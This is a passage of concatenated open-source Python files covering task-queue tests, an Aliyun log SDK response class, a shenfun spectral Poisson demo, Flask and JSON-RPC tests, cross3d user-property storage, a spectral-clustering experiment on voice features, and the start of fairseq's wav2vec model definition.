self.assertEqual(0, utils.QueueSize())
expected_size = 10
for _ in xrange(expected_size):
deferred.defer(dir)
self.assertEqual(expected_size, utils.QueueSize())
class CappedDeferTest(basetest.UpvoteTestCase):
def testSuccess(self):
max_size = 6
total_size = 10
expected_results = [True] * max_size + [False] * (total_size - max_size)
actual_results = [
utils.CappedDefer(dir, max_size) for _ in xrange(total_size)
]
self.assertEqual(expected_results, actual_results)
_DEFAULT = constants.TASK_QUEUE.DEFAULT
_METRICS = constants.TASK_QUEUE.METRICS
def _FreeFunction(a=0):
return a + 1
if __name__ == '__main__':
basetest.main()
|
aliyun/log/logresponse.py | topdown618/aliyun-log-python-sdk | 130 | 11086293 | #!/usr/bin/env python
# encoding: utf-8
# Copyright (C) Alibaba Cloud Computing
# All rights reserved.
from .util import Util
class LogResponse(object):
""" The base response class of all log response.
:type headers: dict
:param headers: HTTP response header
"""
def __init__(self, headers, body=''):
self.headers = headers
if body is None:
body = ''
self.body = body
def get_request_id(self):
""" Get the request id of the response. '' will be return if not set.
:return: string, request id
"""
return Util.h_v_td(self.headers, 'x-log-requestid', '')
def get_body(self):
""" Get body
:return: string
"""
return self.body
def get_all_headers(self):
""" Get all http header of the response
:return: dict, response header
"""
return self.headers
def get_header(self, key):
""" Get specified http header of the response, '' will be return if not set.
:type key: string
:param key: the key to get header
:return: string, response header
"""
return self.headers[key] if key in self.headers else ''
def log_print(self):
print('header: ', self.headers)
|
demo/hermite_poisson2D.py | spectralDNS/shenfun | 138 | 11086362 | r"""
Solve Poisson equation in 2D with homogeneous Dirichlet bcs in one direction and
periodic in the other. The domain is (-inf, inf) x [0, 2pi]
.. math::
\nabla^2 u = f,
The equation to solve for a Hermite x Fourier basis is
.. math::
(\nabla u, \nabla v) = -(f, v)
"""
import os
import sys
from sympy import symbols, exp, hermite, cos
import numpy as np
from shenfun import inner, grad, TestFunction, TrialFunction, la, \
Array, Function, FunctionSpace, TensorProductSpace, comm
assert len(sys.argv) == 2, 'Call with one command-line argument'
assert isinstance(int(sys.argv[-1]), int)
# Use sympy to compute a rhs, given an analytical solution
x, y = symbols("x,y", real=True)
#ue = sin(4*x)*exp(-x**2)
ue = cos(4*y)*hermite(4, x)*exp(-x**2/2)
fe = ue.diff(x, 2)+ue.diff(y, 2)
# Size of discretization
N = int(sys.argv[-1])
SD = FunctionSpace(N, 'Hermite')
K0 = FunctionSpace(N, 'Fourier', dtype='d')
T = TensorProductSpace(comm, (SD, K0), axes=(0, 1))
u = TrialFunction(T)
v = TestFunction(T)
# Get f on quad points
fj = Array(T, buffer=fe)
# Compute right hand side of Poisson equation
f_hat = Function(T)
f_hat = inner(v, -fj, output_array=f_hat)
# Get left hand side of Poisson equation
matrices = inner(grad(v), grad(u))
# Solve and transform to real space
u_hat = Function(T) # Solution spectral space
sol = la.SolverGeneric1ND(matrices)
u_hat = sol(f_hat, u_hat)
uq = u_hat.backward()
# Compare with analytical solution
uj = Array(T, buffer=ue)
assert np.allclose(uj, uq, atol=1e-5)
print('Error ', np.linalg.norm(uj-uq))
if 'pytest' not in os.environ:
import matplotlib.pyplot as plt
plt.figure()
X = T.local_mesh(True)
plt.contourf(X[0], X[1], uq)
plt.colorbar()
plt.figure()
plt.contourf(X[0], X[1], uj)
plt.colorbar()
plt.figure()
plt.contourf(X[0], X[1], uq-uj)
plt.colorbar()
plt.title('Error')
plt.figure()
X = T.local_mesh()
for x in np.squeeze(X[0]):
plt.plot((x, x), (np.squeeze(X[1])[0], np.squeeze(X[1])[-1]), 'k')
for y in np.squeeze(X[1]):
plt.plot((np.squeeze(X[0])[0], np.squeeze(X[0])[-1]), (y, y), 'k')
#plt.show()
|
python/akg/ops/math/__init__.py | tianjiashuo/akg | 286 | 11086374 | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""__init__"""
from .abs import Abs
from .abs_sum import AbsSum
from .add import Add
from .addn import Addn
from .assign import Assign
from .cast import Cast
from .divide import Divide
from .equal import Equal
from .exp import Exp
from .expand_dims import ExpandDims
from .greater_equal import GreaterEqual
from .less import Less
from .less_equal import LessEqual
from .log import Log
from .logical_and import LogicalAnd
from .logical_not import LogicalNot
from .logical_or import LogicalOr
from .maximum import Maximum
from .minimum import Minimum
from .mul import Mul
from .neg import Neg
from .notequal import NotEqual
from .pow import Pow
from .reduce_and import ReduceAnd
from .reduce_max import ReduceMax
from .reduce_min import ReduceMin
from .reduce_or import ReduceOr
from .reduce_prod import ReduceProd
from .reduce_sum import ReduceSum
from .reciprocal import Reciprocal
from .round import Round
from .rsqrt import Rsqrt
from .select import Select
from .sqrt import Sqrt
from .sub import Sub
from .sum import Sum
|
apps/autotest/run.py | rainydaygit/testtcloudserver | 349 | 11086393 | from apps.autotest.settings import config
from apps.autotest.views.performance import performance
if config.SERVER_ENV != 'dev':
from gevent import monkey
monkey.patch_all()
else:
pass
from apps.autotest.views.datashow import datashow
from apps.autotest.views.monkey import monkey
from library.api.tFlask import tflask
def create_app():
app = tflask(config)
register_blueprints(app)
return app
def register_blueprints(app):
app.register_blueprint(monkey, url_prefix='/v1/monkey')
app.register_blueprint(datashow, url_prefix='/v1/datashow')
app.register_blueprint(performance, url_prefix='/v1/performance')
if __name__ == '__main__':
create_app().run(port=config.PORT)
|
diffy_api/tasks/views.py | TheGableMethod/diffy | 577 | 11086420 | """
.. module: diffy.tasks.views
:platform: Unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from flask import Blueprint
from flask_restful import Api, Resource
from diffy_api.extensions import rq
from diffy_api.common.util import validate_schema
from diffy_api.schemas import task_output_schema, task_list_output_schema
mod = Blueprint("tasks", __name__)
api = Api(mod)
class TaskList(Resource):
"""Defines the 'taskss' endpoints"""
def __init__(self):
super(TaskList, self).__init__()
@validate_schema(None, task_list_output_schema)
def get(self):
"""
.. http:get:: /tasks
The current list of tasks
**Example request**:
.. sourcecode:: http
GET /tasks HTTP/1.1
Host: example.com
Accept: application/json, text/javascript
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: text/javascript
# TODO
:statuscode 200: no error
:statuscode 403: unauthenticated
"""
queue = rq.get_queue()
data = queue.get_jobs()
return data, 200
class Task(Resource):
"""Defines the 'taskss' endpoints"""
def __init__(self):
super(Task, self).__init__()
@validate_schema(None, task_output_schema)
def get(self, task_id):
"""
.. http:get:: /tasks
The current list of tasks
**Example request**:
.. sourcecode:: http
GET /tasks HTTP/1.1
Host: example.com
Accept: application/json, text/javascript
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: text/javascript
# TODO
:statuscode 200: no error
:statuscode 403: unauthenticated
"""
queue = rq.get_queue()
return queue.fetch_job(task_id)
api.add_resource(Task, "/tasks/<task_id>")
api.add_resource(TaskList, "/tasks", endpoint="tasks")
|
cross3d/abstract/abstractuserprops.py | vedantirb/cross3d | 129 | 11086434 | # #
# \namespace cross3d.UserProps
#
# \remarks The cross3d.UserProps package creates an abstract wrapper around a 3d system
# for storing and retrieving custom user props
#
# \author mike
# \author Blur Studio
# \date 05/26/11
#
import re
import json
import cross3d
from collections import OrderedDict
from PyQt4.QtCore import QTimer as _QTimer
dispatchObject = cross3d.dispatch.dispatchObject
class AbstractUserProps(dict):
"""
The cross3d.UserProps package creates an abstract wrapper around a
3d system for storing and retrieving custom user props
"""
def __init__(self, nativePointer):
dict.__init__(self)
self._nativePointer = nativePointer
# Handling and cleaning legacy tags. This is going away soon.
# Pulls values from Tags and BlurTags the first time they are encountered
# and then immediately deletes them so that they don't continue to overwrite
# any values that are set on UserProps.
# if 'BlurTags' in self.keys() and self['BlurTags']:
# for key in self['BlurTags']:
# self[key] = self['BlurTags'][key]
# scene = cross3d.Scene()
# obj = cross3d.SceneObject(scene, nativePointer)
# self['BlurTags'] = {}
# if not obj.model().isReferenced():
# del self['BlurTags']
# if 'Tags' in self.keys() and self['Tags']:
# for key in self['Tags']:
# self[key] = self['Tags'][key]
# scene = cross3d.Scene()
# obj = cross3d.SceneObject(scene, nativePointer)
# self['Tags'] = {}
# if not obj.model().isReferenced():
# del self['Tags']
def __contains__(self, key):
return key in self.lookupProps()
def __getitem__(self, key):
return dict.__getitem__(self, key)
def __iter__(self):
return iter(self.keys())
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
self.emitChange()
def __str__(self):
return '<{cls} {props}>'.format(cls=self.__class__.__name__, props=unicode(self.lookupProps()))
def clear(self):
self.lookupProps().clear()
def copy(self):
return self.lookupProps().copy()
def emitChange(self, key=None):
if key == 'Tags':
dispatchObject('TagChanged', self._nativePointer)
else:
dispatchObject('customPropChanged', self._nativePointer)
def keys(self):
return self.lookupProps().keys()
def items(self):
return self.lookupProps().items()
def iteritems(self):
return self.lookupProps().iteritems()
def iterkeys(self):
return self.lookupProps().iterkeys()
def itervalues(self):
return self.lookupProps().itervalues()
def has_key(self, key):
return self.lookupProps().has_key(key)
def get(self, key, default=None):
return self.lookupProps().get(key, default)
def lookupProps(self):
"""
This is the workhorse method for the class; it is responsible for
providing the dictionary of key/value pairs used by most of the
class. If it is unabstracted it will return an empty dictionary
:return: dict
"""
return {}
def toString(self, prefix='', seperator=':', postfix=' '):
out = ''
for key in self.keys():
value = self[key]
line = prefix + key + seperator + unicode(value) + postfix
out += line
return out
def updateFromName(self, format=None):
# TODO: REMOVE the dependency of this module
from blur3d.naming import Name
name = Name(self._nativePointer.name, format)
for element in name.elements():
key = element.objectName()
text = element.text()
if text == 'x':
if key in self:
del self[key]
else:
self[key] = text
def pop(self, key, default=None):
return self.lookupProps().pop(key, default)
def popitem(self):
return self.lookupProps().popitem()
def setAllHidden(self, state):
"""
Make all user props visible or hidden if the software supports it.
:param state: Should the propery be shown or hidden
"""
for key in self.keys():
self.setHidden(key, state)
def setdefault(self, key, default=None):
props = self.lookupProps()
if not key in props:
self[key] = default
return self[key]
def setHidden(self, key, state):
"""
Hide the mechanism that stores user props in software that supports it.
:param key: The key used to access the user prop
:param state: If the item is hidden or shown
"""
return False
def update(self, *args, **kwargs):
for k, v in dict(*args, **kwargs).iteritems():
self[k] = v
def values(self):
return self.lookupProps().values()
@staticmethod
def escapeKey(string):
"""
Replaces any unstorable characters in key with their html codes
"""
if not isinstance(string, (str, unicode)):
string = unicode(string)
return string.replace(' ', ' ').replace('\n', ' ').replace('\r', ' ')
@staticmethod
def escapeValue(string):
"""
Replaces any unstorable characters in value with their html codes
"""
if not isinstance(string, (str, unicode)):
string = unicode(string)
return string.replace('\r\n', ' ').replace('\n', ' ').replace('\r', ' ')
@staticmethod
def unescapeKey(string):
"""
Replaces any html codes with their associated unstorable characters
"""
if not isinstance(string, (str, unicode)):
string = unicode(string)
return string.replace(' ', ' ').replace(' ', '\n').replace(' ', '\r')
@staticmethod
def unescapeValue(string):
"""
Replaces any html codes with their associated unstorable characters
"""
string = unicode(string)
try:
return json.loads( string )
except ValueError:
pass
string, typ = AbstractUserProps._decodeString(string)
if typ == float:
return float(string)
elif typ == int:
return int(string)
elif typ in (list, dict, tuple, bool, OrderedDict):
return eval(string)
return string
@staticmethod
def _decodeString(string):
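# Infer the original Python type of a value stored as text: int, float, bool, dict,
# list, tuple or OrderedDict; '#(...)'-style arrays are rewritten as Python lists.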
try:
int(string)
return string, int
except:
pass
if string.find('.') != -1:
try:
float(string)
return string, float
except:
pass
if string in ('True', 'False'):
return string, bool
if re.match('{.*}', string):
return string, dict
if re.match('\[.*\]', string):
return string, list
if re.match('#\(.*\)', string):
data = []
s = string
sOpen, close = AbstractUserProps._posCounter(s)
while (sOpen != -1 or close != -1):
s = s[:sOpen-2]+'['+s[sOpen:close]+']'+s[close+1:]
sOpen, close = AbstractUserProps._posCounter(s)
return s, list
if re.match('\(.*\)', string):
return string, tuple
if re.match('OrderedDict\(.*\)', string):
return string, OrderedDict
return string, None
@staticmethod
def _posCounter(string, opening = '#(', closing = ')'):
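# Locate the first balanced '#(' ... ')' pair in the string and return the positions
# just after the opener and at the closer, or (-1, -1) if no balanced pair is found.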
openBr = 0
openPos = 0
found = False
for pos in range(0, len(string)):
if string[pos-2:pos] == opening:
openBr += 1
if not found:
openPos = pos
found = True
elif string[pos] == closing:
openBr -= 1
if found and not openBr:
break
else:
return -1,-1
return openPos, pos
class AbstractFileProps(AbstractUserProps):
def __init__(self, fileName=''):
self._dso = None
self.fileName = fileName
self._closeScheduled = False
self._saveScheduled = False
super(AbstractFileProps, self).__init__(None)
def __delitem__(self, key):
if self.dso().open(self.fileName):
self._saveScheduled = True
if self.dso().removeCustomProperty(key):
self._close()
return True
raise KeyError('FileProps does not contain key: %s' % key)
else:
raise cross3d.Exceptions.FileNotDSO
def __getitem__(self, key):
if self.dso().open(self.fileName):
self._scheduleClose()
out = self.dso().customProperty(key)
if out:
return self.unescapeValue(out.value())
raise KeyError('FileProps does not contain key: %s' % key)
else:
raise cross3d.Exceptions.FileNotDSO
def __setitem__(self, key, value):
if self.dso().open(self.fileName):
self._saveScheduled = True
prop = self.dso().customProperty(key)
if prop:
prop.setValue(value)
else:
self.dso().addCustomProperty(key, value)
self._close()
self.emitChange()
else:
raise cross3d.Exceptions.FileNotDSO
def __repr__(self):
return self.__str__()
def _close(self):
if self._saveScheduled:
self._saveScheduled = False
self.dso().save()
self.dso().close()
self._closeScheduled = False
def _scheduleClose(self, save=False):
if save:
self._saveScheduled = save
if not self._closeScheduled:
_QTimer.singleShot(0, self._close)
self._closeScheduled = True
def clear(self):
"""
Removes all attributes and immediately saves the changes. There is no QTimer delay.
"""
if self.dso().open(self.fileName):
self.dso().clear()
self._saveScheduled = True
self._close()
self.emitChange()
else:
raise cross3d.Exceptions.FileNotDSO
def close(self):
"""
Immediately closes the connection to the file.
"""
if self.dso().open(self.fileName):
self._close()
else:
raise cross3d.Exceptions.FileNotDSO
def dso(self):
if not self._dso:
from cross3d.migrate import dsofile
self._dso = dsofile.DSOFile()
return self._dso
def lookupProps(self):
dso = self.dso()
if self.dso().open(self.fileName):
self._scheduleClose()
ret = {}
[ret.update({prop.name(): self.unescapeValue(prop.value())}) for prop in self.dso().customProperties()]
return ret
else:
raise cross3d.Exceptions.FileNotDSO
def update(self, *args, **kwargs):
"""
Adds all provided items and immediately saves the changes. There is no QTimer delay.
"""
if self.dso().open(self.fileName):
for k, v in dict(*args, **kwargs).iteritems():
self[k] = v
self._saveScheduled = True
self._close()
else:
raise cross3d.Exceptions.FileNotDSO
# register the symbol
cross3d.registerSymbol('UserProps', AbstractUserProps, ifNotFound=True)
cross3d.registerSymbol('FileProps', AbstractFileProps, ifNotFound=True)
|
Chapter09/mandelbrot/mandelbrot/simple/__init__.py | yoyboy/Software-Architecture-with-Python | 103 | 11086444 |
from . import mandelbrot
|
test/test_application/test_jsonrpc/test_getblock.py | darosior/spruned | 152 | 11086467 |
import asyncio
import random
from unittest import TestCase
from unittest.mock import Mock, call
from spruned.application.jsonrpc_server import JSONRPCServer
from spruned.application.utils.jsonrpc_client import JSONClient
from test.utils import async_coro
class TestJSONRPCServerGetblock(TestCase):
def setUp(self):
bindport = random.randint(31337, 41337)
self.sut = JSONRPCServer('127.0.0.1', bindport, 'testuser', 'testpassword')
self.vo_service = Mock()
self.sut.set_vo_service(self.vo_service)
self.client = JSONClient(b'testuser', b'testpassword', '127.0.0.1', bindport)
self.loop = asyncio.get_event_loop()
def test_getblock_success(self):
self.vo_service.getblock.side_effect = [async_coro({'block': 'header'}),
async_coro('cafebabe')]
async def test():
await self.sut.start()
response = await self.client.call('getblock', params=['00' * 32])
response2 = await self.client.call('getblock', params=['00' * 32, False])
return response, response2
res, res2 = self.loop.run_until_complete(test())
self.assertEqual(
res,
{'error': None, 'id': 1, 'jsonrpc': '2.0', 'result': {'block': 'header'}}
)
self.assertEqual(
res2,
{'error': None, 'id': 1, 'jsonrpc': '2.0', 'result': 'cafebabe'}
)
Mock.assert_has_calls(
self.vo_service.getblock,
calls=[
call('00' * 32, 1),
call('00' * 32, False)
]
)
def test_getblock_error_missing(self):
response = None
self.vo_service.getblock.return_value = async_coro(response)
async def test():
await self.sut.start()
response = await self.client.call('getblock', params=['00'*32])
return response
res = self.loop.run_until_complete(test())
self.assertEqual(
res,
{'error': {'code': -5, 'message': 'Block not found'}, 'id': 1, 'jsonrpc': '2.0', 'result': None}
)
Mock.assert_called_with(self.vo_service.getblock, '00' * 32, 1)
def test_getblock_error_error_params(self):
response = None
self.vo_service.getblock.return_value = async_coro(response)
async def test():
await self.sut.start()
response1 = await self.client.call('getblock', params=['wrong_blockhash'])
response2 = await self.client.call('getblock')
return response1, response2
res, res2 = self.loop.run_until_complete(test())
self.assertEqual(
res,
{
'jsonrpc': '2.0',
'error': {
'code': -5, 'message': 'Error parsing JSON:wrong_blockhash'
},
'id': 1,
'result': None
}
)
# Really should be code: -32602, but that'll cause bitcoin-cli not to
# error out correctly, so we use -1 instead
self.assertEqual(
res2,
{'jsonrpc': '2.0', 'error': {'code': -1, 'message': 'Invalid params'}, 'id': 1, 'result': None}
)
Mock.assert_not_called(self.vo_service.getblock)
|
tests/config/__init__.py | dadaloop82/viseron | 399 | 11086485 |
"""Tests for config module."""
|
tests/test_init.py | linshoK/pysen | 423 | 11086494 |
import argparse
import pathlib
import tempfile
import unittest.mock
from typing import Optional, Sequence
import pytest
import pysen
from pysen import ConfigureLintOptions, configure_lint
from pysen.exceptions import CommandNotFoundError
from pysen.manifest import Manifest, TargetType
from pysen.reporter import ReporterFactory
from pysen.runner_options import RunOptions
BASE_DIR = pathlib.Path(__file__).resolve().parent
def test_load_manifest() -> None:
manifest = pysen.load_manifest(BASE_DIR / "fakes/configs/example.toml")
assert manifest is not None
with pytest.raises(FileNotFoundError):
pysen.load_manifest(BASE_DIR / "no_such_file.toml")
def test_build_manifest() -> None:
# NOTE(igarashi): since build_manifest is just a reference for pysen.build_manifest.build,
# we just check if the function does not raise an error in this test.
manifest = pysen.build_manifest(
[], external_builder=BASE_DIR / "fakes/configs/good_builder.py"
)
assert manifest is not None
def test_run() -> None:
with unittest.mock.patch(
"pysen.runner.Runner.export_settings"
) as mock_export, unittest.mock.patch("pysen.runner.run_target") as mock_run:
assert pysen.run(
BASE_DIR, "lint", pyproject=BASE_DIR / "fakes/configs/example.toml"
)
mock_export.assert_called()
# check if settings_dir is correctly handled
mock_export.reset_mock()
with tempfile.TemporaryDirectory() as d:
td = pathlib.Path(d)
assert pysen.run(
BASE_DIR,
"lint",
pyproject=BASE_DIR / "fakes/configs/example.toml",
settings_dir=td,
)
mock_export.assert_called_once_with(
BASE_DIR, td, argparse.Namespace(disable=None, enable=None)
)
with pytest.raises(CommandNotFoundError):
assert pysen.run(
BASE_DIR, "lint2", pyproject=BASE_DIR / "fakes/configs/example.toml"
)
components = configure_lint(ConfigureLintOptions(enable_black=True))
assert pysen.run(BASE_DIR, "lint", components=components)
with pytest.raises(CommandNotFoundError):
assert pysen.run(BASE_DIR, "lint2", components=components)
manifest = Manifest(components)
assert pysen.run(BASE_DIR, "lint", manifest=manifest)
with pytest.raises(CommandNotFoundError):
assert pysen.run(BASE_DIR, "lint2", manifest=manifest)
# TODO(igarashi): Add test to check run() handles both args and manifest_args
with pytest.raises(FileNotFoundError):
pysen.run(BASE_DIR, "lint", pyproject=BASE_DIR / "no_such_file.toml")
with pytest.raises(ValueError):
pysen.run(BASE_DIR, "lint")
with pytest.raises(ValueError):
pysen.run(
BASE_DIR,
"lint",
pyproject=BASE_DIR / "fakes/configs/example.toml",
manifest=manifest,
)
# NOTE(igarashi): Check that run() returns False when the command reports an error
def side_effect(
target: TargetType,
reporters: ReporterFactory,
options: RunOptions,
files: Optional[Sequence[pathlib.Path]],
) -> None:
with reporters.create("hoge") as r:
r.set_result(False, 128)
mock_run.side_effect = side_effect
assert not pysen.run(
BASE_DIR, "lint", pyproject=BASE_DIR / "fakes/configs/example.toml"
)
assert not pysen.run(BASE_DIR, "lint", components=components)
assert not pysen.run(BASE_DIR, "lint", manifest=manifest)
|
classifiers/dimensionality_reduction/graph_spectral_analysis&spectral_clustering_default.py | gionanide/Speech-Signal-Processing-and-Classification | 203 | 11086496 |
#!/usr/bin/python
from __future__ import division
import pandas as pd
from sklearn import model_selection
from sklearn.svm import SVC # support vectors for classification
from sklearn.metrics import accuracy_score, confusion_matrix, classification_report
from sklearn.model_selection import cross_val_score, GridSearchCV
import timeit
from sklearn.preprocessing import MinMaxScaler
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
import numpy as np
from sklearn.neighbors import KNeighborsClassifier, NearestNeighbors
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
import seaborn as sns
from sklearn.manifold import LocallyLinearEmbedding, SpectralEmbedding, Isomap
from sklearn.cluster import SpectralClustering
from sklearn.metrics.cluster import homogeneity_score
'''this function takes as input the path of a file with features and labels and returns the content of this file in csv format in
the form feature1.........feature13,Label'''
def readFile():
#make the format of the csv file. Our format is a vector with 13 features and a label which shows the condition of the
#sample hc/pc : healthy case, Parkinson case
names = ['Feature1', 'Feature2', 'Feature3', 'Feature4','Feature5','Feature6','Feature7','Feature8','Feature9',
'Feature10','Feature11','Feature12','Feature13','Label']
#path to read the samples, samples consist of healthy subjects and subjects suffering from Parkinson's disease.
#path = 'mfcc_man_woman.txt'
path = 'PATH_TO_SAMPLES.txt'
#path = '/home/gionanide/Theses_2017-2018_2519/features/parkinson_healthy/mfcc_parkinson_healthy.txt'
#read file in csv format
data = pd.read_csv(path,names=names )
#return an array of the shape (2103, 14), lines are the samples and columns are the features as we mentioned before
return data
'takes the csv file and splits the label from the features'
def splitData(data):
# Split-out the set in two different arrayste
array = data.values
#features array contains only the features of the samples
features = array[:,0:13]
#labels array contains only the lables of the samples
labels = array[:,13]
return features,labels
'''
make this class in order to train the model with the same amount of samples of each class, because we have bigger support from class 0
than class1, particularly it is 9 to 1.'''
def equalizeClasses(data):
#take all the samples from the data frame that they have Label value equal to 0 and in the next line equal to 1
class0 = data.loc[data['Label'] == 0]#class0 and class1 are dataFrames
class1 = data.loc[data['Label'] == 1]
#check which class has more samples, by divide them and check if the number is bigger or smaller than 1
weight = len(class0) // len(class1) #take the results as an integer in order to split the class, using prior knowledge that
#class0 has more samples, if it is bigger class0 has more samples and to be exact weight to 1
balance = (len(class0) // weight) #this is the number of samples in order to balance our classes
#the keyword argument frac specifies the fraction of rows to return in the random sample, so fra=1 means, return random all rows
        #in a way we shuffle our data in order not to take the same samples in every iteration
#class0 = class0.sample(frac=1)
#samples array for training taking the balance number of samples for the shuffled dataFrame
newClass0 = class0.sample(n=balance)
#and now combine the new dataFrame from class0 with the class1 to return the balanced dataFrame
newData = pd.concat([newClass0, class1])
#return the new balanced(number of samples from each class) dataFrame
return newData
'''we made this function in order to make a loop, the equalized data take only a small piece of the existing data, so with this
loop we are going to iterate over all the data, but from every iteration we are keeping only the samples that were support
vectors, and only for the class from which we are taking a piece of its samples'''
def keepSV():
print 'yolo'
'''we use this function in order to apply greedy search for finding the parameters that best fit our model. We have to mention
that we start this procedure from a very large field and then we tried to focus on the direction where the results
appear better. For example for the C parameter, the first range was [0.0001, 0.001, 0.01, 0.1, 1, 10 ,100 ,1000], the result was that
the best value was 1000 so then we tried [100, 1000, 10000, 100000] and so on in order to focus on the area which gives us
the best results. This function is in comments because we found the best parameters and we don't need to run it in every trial.'''
def paramTuning(features_train, labels_train, nfolds):
#using the training data and define the number of folds
#determine the range of the Cs range you want to search
Cs = [0.001, 0.01, 0.1 ,1, 10, 100, 1000, 10000]
#determine the range of the gammas range you want to search
gammas = [0.00000001 ,0.00000001 ,0.0000001, 0.000001, 0.00001, 0.0001, 0.001, 0.01, 0.1 , 1, 10, 100, 1000]
        #make the dictionary
param_grid = {'C': Cs, 'gamma': gammas}
#start the greedy search using all the matching sets from above
grid_search = GridSearchCV(SVC(kernel='poly'),param_grid,cv=nfolds)
#fit your training data
grid_search.fit(features_train, labels_train)
#visualize the best couple of parameters
print grid_search.best_params_
'''Classify Parkinson and Healthy. Build a model which is going to be trained with the given cases and tested on new ones'''
def classifyPHC():
data = readFile()
#data = equalizeClasses(data)
features,labels = splitData(data)
#determine the training and testing size in the range of 1, 1 = 100%
validation_size = 0.2
#here we are splitting our data based on the validation_size into training and testing data
#features_train, features_validation, labels_train, labels_validation = model_selection.train_test_split(features, labels,
#test_size=validation_size)
#we are using all the features because it is clustering so we do not want to split to testing and training
        #because we apply unsupervised techniques
#normalize data in the range [-1,1]
scaler = MinMaxScaler(feature_range=(-1, 1))
        #fit only the training data in order to find the margin and then transform the test data without normalizing them
scaler.fit(features)
features_scalar = scaler.transform(features)
        #transform the validation features without fitting them
#features_validation_scalar = scaler.transform(features_validation)
#apply the dimensionality reduction using graph spectral analysis
'''#LocallyLinearEmbedding
lle = LocallyLinearEmbedding(n_components=2)
#transform data
features_embedded = lle.fit_transform(features_scalar)'''
'''#Isometric Mapping
isomap = Isomap(n_components=2)
#transform data
features_embedded = isomap.fit_transform(features_scalar)'''
#Graph embedding
spectralEmbedding = SpectralEmbedding(n_components=2)
#transform training and validation data
features_embedded = spectralEmbedding.fit_transform(features_scalar)
#we can see the shapes of the array just to check
print 'feature training array: ',features_embedded.shape #,'and label training array: ',labels_train.shape
#print 'feature testing array: ',features_validation_embedded.shape,'and label testing array: ',labels_validation.shape,'\n'
#take the best couple of parameters from the procedure of greedy search
#paramTuning(features_train, labels_train, 5)
#we initialize our model
#svm = SVC(kernel='poly',C=0.001,gamma=10,degree=3,decision_function_shape='ovr')
#svm = KNeighborsClassifier(n_neighbors=3)
#Apply spectral clustering
spectralClustering = SpectralClustering(n_clusters=2)
        #train our model with the data that we previously processed
#spectralClustering.fit(features_embedded )
#now test our model with the test data
spectralClustering.fit(features_embedded)
predicted_labels = spectralClustering.labels_
#first implementation of score computing
#accuracy = accuracy_score(labels, predicted_labels)
        #More robust implementation: the homogeneity score is invariant to permuted/opposite cluster labels
accuracy = homogeneity_score(labels, predicted_labels)
print 'Clustering accuracy: ',accuracy*100,'\n'
#confusion matrix to illustrate the faulty classification of each class
conf_matrix = confusion_matrix(labels, predicted_labels)
print 'Confusion matrix: \n',conf_matrix,'\n'
print 'Support class 0 class 1:'
#calculate the support of each class
print ' ',conf_matrix[0][0]+conf_matrix[0][1],' ',conf_matrix[1][0]+conf_matrix[1][1],'\n'
#calculate the accuracy of each class
hC = (conf_matrix[0][0]/(conf_matrix[0][0]+conf_matrix[0][1]))*100
pC = (conf_matrix[1][1]/(conf_matrix[1][0]+conf_matrix[1][1]))*100
#see the inside details of the classification
        print 'For class 0 man cases:',conf_matrix[0][0],'classified correctly and',conf_matrix[0][1],'misclassified,',hC,'accuracy \n'
        print 'For class 1 woman cases:',conf_matrix[1][1],'classified correctly and',conf_matrix[1][0],'misclassified,',pC,'accuracy\n'
        #plot the features after the spectral embedding procedure, coloured by the true labels
embedded_labels = pd.DataFrame({'Feature1': features_embedded[: ,0], 'Feature2': features_embedded[: ,1],'Label': labels})
sns.pairplot(embedded_labels, hue='Label')
#plt.savefig('kpca_trainset_parkinson_healthy.png')
#plt.show()
        #plot the features after the spectral embedding procedure, coloured by the predicted cluster labels
embedded_predicted_labels = pd.DataFrame({'Feature1': features_embedded[: ,0], 'Feature2': features_embedded[: ,1],'Label': predicted_labels})
sns.pairplot(embedded_predicted_labels, hue='Label')
#plt.savefig('kpca_trainset_parkinson_healthy.png')
plt.show()
def main():
#calculate the time
import time
start_time = time.time()
#we are making an array in order to keep the support vectors and feed the function with them for the next iteration
#support_vectors =
classifyPHC()
time = time.time()-start_time
print 'time: ',time
main()
|
fairseq/models/wav2vec.py | theorm/fairseq | 239 | 11086497 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import sys
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from . import (
BaseFairseqModel, register_model, register_model_architecture
)
@register_model('wav2vec')
class Wav2VecModel(BaseFairseqModel):
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
parser.add_argument('--prediction-steps', type=int, metavar='N', help='number of steps ahead to predict')
parser.add_argument('--sample-distance', type=int, metavar='N',
help='sample distance from target. does not work properly with cross-sampling')
parser.add_argument('--cross-sample-negatives', action='store_true',
help='whether to sample negatives across examples in the same batch')
parser.add_argument('--num-negatives', type=int, metavar='N', help='number of negative examples')
parser.add_argument('--conv-feature-layers', type=str, metavar='EXPR',
help='convolutional feature extraction layers [(dim, kernel_size, stride), ...]')
parser.add_argument('--conv-aggregator-layers', type=str, metavar='EXPR',
                            help='convolutional aggregator layers [(dim, kernel_size, stride), ...]')
parser.add_argument('--dropout', type=float, metavar='D', help='dropout to apply within the model')
parser.add_argument('--dropout-features', type=float, metavar='D', help='dropout to apply to the features')
parser.add_argument('--dropout-agg', type=float, metavar='D', help='dropout to apply after aggregation step')
parser.add_argument('--encoder', type=str, choices=['cnn'], help='type of encoder to use')
parser.add_argument('--aggregator', type=str, choices=['cnn', 'gru'],
help='type of aggregator to use')
parser.add_argument('--gru-dim', type=int, metavar='N', help='GRU dimensionality')
parser.add_argument('--no-conv-bias', action='store_true',
help='if set, does not learn bias for conv layers')
parser.add_argument('--agg-zero-pad', action='store_true',
help='if set, zero pads in aggregator instead of repl pad')
